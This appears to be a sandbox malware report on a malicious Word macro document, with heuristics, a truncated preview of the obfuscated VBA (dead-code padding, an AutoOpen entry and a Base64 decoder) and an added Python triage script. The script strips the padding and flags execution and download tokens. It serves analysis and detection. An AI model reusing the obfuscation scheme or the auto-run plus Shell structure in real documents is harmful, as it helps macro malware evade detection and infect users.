Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office (OLE) document carrying a VBA project. Execution starts from an AutoOpen procedure, and the project contains a Shell() call, i.e. an attempt to run an arbitrary command line from the document. That combination is the usual shape of a downloader or dropper, where the macro fetches and executes a second-stage payload; note that the report recovers neither the command line nor a payload URL, so the second stage is inferred from the primitives present rather than observed. The visible source is heavily padded with dead-code blocks (an integer computed from a small arithmetic expression, compared against an unrelated constant, followed by assignments to variables that are never read), a common technique for defeating signature-based macro detection. The ClamAV detection name Doc.Macro.Valyria-6327969-0 is consistent with this assessment.
Heuristics (7)

- ClamAV: Doc.Macro.Valyria-6327969-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Valyria-6327969-0.
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code.
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro.
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents, and documents whose source extraction failed, where no visible source is available.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample olevba did recover the VBA project (see Extracted artifacts), so the "no VBA project recovered" clause is the rule's generic text rather than an observation about this file, and the marker adds nothing beyond OLE_VBA_AUTOOPEN.
- Embedded URL [info] (EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. All ten URLs below were found in document text (OLE body):
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  - http://ns.adobe.com/tiff/1.0/
  - http://ns.adobe.com/exif/1.0/
  - http://ns.adobe.com/photoshop/1.0/
  - http://www.iec.ch
  - http://schemas.openxmlformats.org/drawingml/2006/main
  These are XML namespace and schema identifiers (XMP, RDF, Dublin Core, TIFF/EXIF/Photoshop metadata, an ICC profile reference, DrawingML) of the kind carried by an embedded image and its metadata. None is a download location, and none should be treated as a payload or C2 indicator; the macro's own network or command-line targets, if any, are not among the extracted URLs.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23796 bytes | a7a2a436ff4ddedafc7649fc1c297b9a7c84b92e946217c960465665b61a636f |
Script preview (first 1,000 lines of the extracted script; output truncated by the analyzer):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "bdIFv"
Sub AutoOpen()
Dim tVMuS As Integer
tVMuS = 335 - 169
If tVMuS <> 39281 Then
ct6CvrLM = -11527
Else
upfdqHX = 22409.432849937
End If
Dim v6fJBw As Integer
v6fJBw = 335 - 169
If v6fJBw > 39281 Then
PF132 = False
Else
dxyIbmnV = 2969.1845256388
End If
Dim myjwYl3RW As Integer
myjwYl3RW = 335 - 169
If myjwYl3RW = 39281 Then
idqb1g = 216
Else
RbVnW7 = 0
End If
RkCUaI
Dim jDNvz0Z As Integer
jDNvz0Z = 418 - 368
If jDNvz0Z <> 41244 Then
DxEui = AYIc6ng
Else
IV29b = AYIc6ng
End If
Dim ioAtJbH As Integer
ioAtJbH = 418 - 368
If ioAtJbH <> 41244 Then
NhOvVmcLa = 180
Else
ZP9iS = 46969.270308115
End If
Dim F5iHv As Integer
F5iHv = 418 - 368
If F5iHv < 41244 Then
tCFHYkStW = True
Else
g4XDA = -1581222382
End If
Dim BZFKO6uG As Integer
BZFKO6uG = 6812 / 524
If BZFKO6uG > 62619 Then
Z251hb6B = HkguNU
Else
ALVtI2i8 = False
End If
Dim fCBeM97 As Integer
fCBeM97 = 6812 / 524
If fCBeM97 <> 62619 Then
vlKjNWsZV = 67
Else
P3J9vUdh = 24033
End If
End Sub
Attribute VB_Name = "nPI8yK"
Private Const qdvLKk = 16711680
Private Const l3oul4B = 65280
Private Const CEAjCc = 255
Private Const ndyoCX = 262144
Private Const FGEdzILX = 4096
Private Const S5hFk = 64
Private Const F7Utn = 256
Private Const BHG8NrlTM = 65536
Public Function Sn8vfim(gh4RuE7Gk As String) As String
Dim UaWXj() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
Dim lTemp As Long
Dim EHz2XJ As Integer
EHz2XJ = 277 - 206
If EHz2XJ = 44007 Then
tfRyu4dHn = 45156.819918107
Else
FCtnE = 20544
End If
Dim IGELjYDvs As Integer
IGELjYDvs = 277 - 206
If IGELjYDvs < 44007 Then
BBk6Z0F = 29407
Else
EfVUsB = 42522.117922804
End If
Dim MUaWF As Integer
MUaWF = 277 - 206
If MUaWF > 44007 Then
fFCys = 32283.228682626
Else
GwnEWz = 92
End If
gh4RuE7Gk = Replace(gh4RuE7Gk, vbCr, vbNullString)
Dim NwRTcJ8j As Integer
NwRTcJ8j = 90 + 88
If NwRTcJ8j > 35021 Then
ASJGxB = 9481.8215327367
Else
QzWlB = 4475
End If
Dim Iim9h8GN As Integer
Iim9h8GN = 90 + 88
If Iim9h8GN <> 35021 Then
EiVPHfsd = BPFIkCS3L
Else
VUWp5gh = 13062
End If
Dim zLIKGS90 As Integer
zLIKGS90 = 90 + 88
If zLIKGS90 < 35021 Then
rjUNO = 39176.998861444
Else
THhN3kL = -26841
End If
Dim DOLWZ As Integer
DOLWZ = -1 + 130
If DOLWZ > 45368 Then
GvoS6cpKm = 30
Else
XeBIjK0 = 3342.1421932239
End If
Dim eC1gyln As Integer
eC1gyln = -1 + 130
If eC1gyln < 45368 Then
AtaMZ6P = 560.51457941202
Else
s0xn23PA = -16715
End If
Dim PMZFY8Qwp As Integer
PMZFY8Qwp = -1 + 130
If PMZFY8Qwp > 45368 Then
huxK0X = False
Else
u9xPmiy = False
End If
gh4RuE7Gk = Replace(gh4RuE7Gk, vbLf, vbNullString)
Dim zqY6m As Integer
zqY6m = 4896 / 32
If zqY6m <> 40267 Then
Kwq9bQs1r = 18168.426158892
Else
sc9RA2 = 120
End If
Dim KNkDm As Integer
KNkDm = 4896 / 32
If KNkDm <> 40267 Then
ZYqK21mx = True
Else
W1j42TWf7 = 43555.157577191
End If
Dim puaGbdhM As Integer
puaGbdhM = 306 - 179
If puaGbdhM > 47453 Then
MvfHp = 0
Else
ho6zpXs1E = 0
End If
Dim P7J4yS As Integer
P7J4yS = 306 - 179
If P7J4yS <> 47453 Then
uDTjtx = 26706.771965411
Else
Nuwif = False
End If
lTemp = Len(gh4RuE7Gk) Mod 4
Dim B4glsh As Integer
B4glsh = 154 + 8
If B4glsh > 58054 Then
IYMCl4 = 50818.27949097
Else
Gh3gZGzM = 11957
End If
Dim vi43L0e2 As Integer
vi43L0e2 = 154 + 8
If vi43L0e2 < 58054 Then
IHMu7 = 62083.387963299
Else
ddmxc = 0
End If
Dim osdWV0a As Integer
osdWV0a = 14740 / 110
If osdWV0a <> 39059 Then
QBcZ0 = 0
Else
VxPTVOM = 39114.756126649
End If
Dim bChSr As Integer
bChSr = 14740 / 110
If bChSr > 39059 Then
mEvl3asw = 4827.6607343674
Else
dafPg = -1903
... (truncated)
```

Reading notes: AutoOpen does exactly one real thing, the call to RkCUaI, whose body lies beyond the truncated preview. The module nPI8yK declares a 256-entry translation table, 6/12/18-bit power tables, a quad accumulator, a pad counter and a Len(...) Mod 4 check, which is the shape of a hand-rolled Base64 decoder, so Sn8vfim most likely decodes an encoded string before it reaches the Shell() call flagged by OLE_VBA_SHELL. Every other statement is filler of one fixed seven-line form: an Integer is assigned a small arithmetic result, compared against a constant it can never equal, and both branches assign to variables that are never read.
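The following triage helper is an added example written for this page, not the analyzer's code. It does two things the heuristics above describe: it strips the seven-line filler blocks that pad every procedure in the preview (so an analyst can read what is left), and it then applies the entry-point and execution-token checks behind OLE_VBA_AUTOOPEN and OLE_VBA_SHELL to the cleaned source. The VBA embedded in it is constructed to mirror the preview's structure; the body of RkCUaI, the Base64-looking argument and the Shell call inside it are assumptions, since the real preview is truncated before RkCUaI is defined.

```python
"""Triage helper for dead-code-padded VBA of the kind shown in the preview.

strip_junk()  removes filler blocks of the exact form seen in the sample:
                  Dim X As Integer
                  X = <int> <op> <int>
                  If X <cmp> <int> Then
                  <var> = <literal or name>
                  Else
                  <var> = <literal or name>
                  End If
scan()        reports auto-exec entry points and execution/download tokens,
              the logic behind findings such as OLE_VBA_AUTOOPEN / OLE_VBA_SHELL.
triage()      runs both and adds a junk ratio as an obfuscation signal.
"""
import re

# Constructed sample mirroring the preview's structure (NOT the real macro).
# RkCUaI's body, the Base64-looking argument and the Shell call are assumptions.
SAMPLE = '''Attribute VB_Name = "bdIFv"
Sub AutoOpen()
Dim tVMuS As Integer
tVMuS = 335 - 169
If tVMuS <> 39281 Then
ct6CvrLM = -11527
Else
upfdqHX = 22409.432849937
End If
RkCUaI
Dim jDNvz0Z As Integer
jDNvz0Z = 418 - 368
If jDNvz0Z <> 41244 Then
DxEui = AYIc6ng
Else
IV29b = AYIc6ng
End If
End Sub
Sub RkCUaI()
Dim cmd As String
cmd = Sn8vfim("Y21kIC9jIGVjaG8=")
Shell cmd, vbHide
End Sub
'''

DIM_RE = re.compile(r"^Dim (\w+) As Integer$")
ARITH_RE = re.compile(r"^(\w+) = -?\d+ [-+*/] -?\d+$")
IF_RE = re.compile(r"^If (\w+) (?:<>|<=|>=|<|>|=) -?\d+ Then$")
# Dead assignment: a bare name set to a number, boolean or another bare name.
ASSIGN_RE = re.compile(r"^\w+ = (?:-?\d+(?:\.\d+)?|True|False|\w+)$")

AUTOEXEC = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open",
            "Workbook_Open", "Auto_Open", "Auto_Close")
EXEC_TOKENS = ("Shell", "WScript.Shell", "CreateObject", "ShellExecute",
               "URLDownloadToFile", "XMLHTTP", "ADODB.Stream", "Environ",
               "CallByName")


def strip_junk(src: str):
    """Return (cleaned_source, number_of_filler_blocks_removed).

    Only a full seven-line match is removed, so a genuine If block whose
    predicate is not an Integer opaque predicate is left alone.
    """
    lines = [ln.strip() for ln in src.splitlines()]
    out, removed, i = [], 0, 0
    while i < len(lines):
        if i + 6 < len(lines):
            m = DIM_RE.match(lines[i])
            if m:
                var = m.group(1)
                a = ARITH_RE.match(lines[i + 1])
                c = IF_RE.match(lines[i + 2])
                if (a and a.group(1) == var and c and c.group(1) == var
                        and ASSIGN_RE.match(lines[i + 3]) and lines[i + 4] == "Else"
                        and ASSIGN_RE.match(lines[i + 5]) and lines[i + 6] == "End If"):
                    i += 7
                    removed += 1
                    continue
        out.append(lines[i])
        i += 1
    return "\n".join(out), removed


def scan(src: str) -> dict:
    """Flag auto-exec entry points and execution tokens (VBA is case-insensitive)."""
    autoexec = [n for n in AUTOEXEC
                if re.search(rf"\bSub\s+{re.escape(n)}\b", src, re.I)]
    exec_tokens = [t for t in EXEC_TOKENS
                   if re.search(rf"\b{re.escape(t)}\b", src, re.I)]
    return {"autoexec": autoexec, "exec_tokens": exec_tokens,
            "suspicious": bool(autoexec and exec_tokens)}


def triage(src: str) -> dict:
    """Strip filler, scan what remains, and report how much of the file was filler."""
    cleaned, removed = strip_junk(src)
    report = scan(cleaned)
    report["junk_blocks"] = removed
    report["junk_ratio"] = round(removed * 7 / max(1, len(src.splitlines())), 2)
    report["cleaned"] = cleaned
    return report


if __name__ == "__main__":
    r = triage(SAMPLE)
    print(r["cleaned"])
    print({k: v for k, v in r.items() if k != "cleaned"})
```

On the constructed sample the cleaned output collapses AutoOpen to a single call to RkCUaI, the scan reports AutoOpen together with Shell, and 14 of the 23 lines (a ratio of 0.61) were filler. Run against the real macros.bas the ratio would be far higher, and that ratio is itself a usable detection signal: benign templates do not carry dozens of Integer opaque predicates whose results are never read.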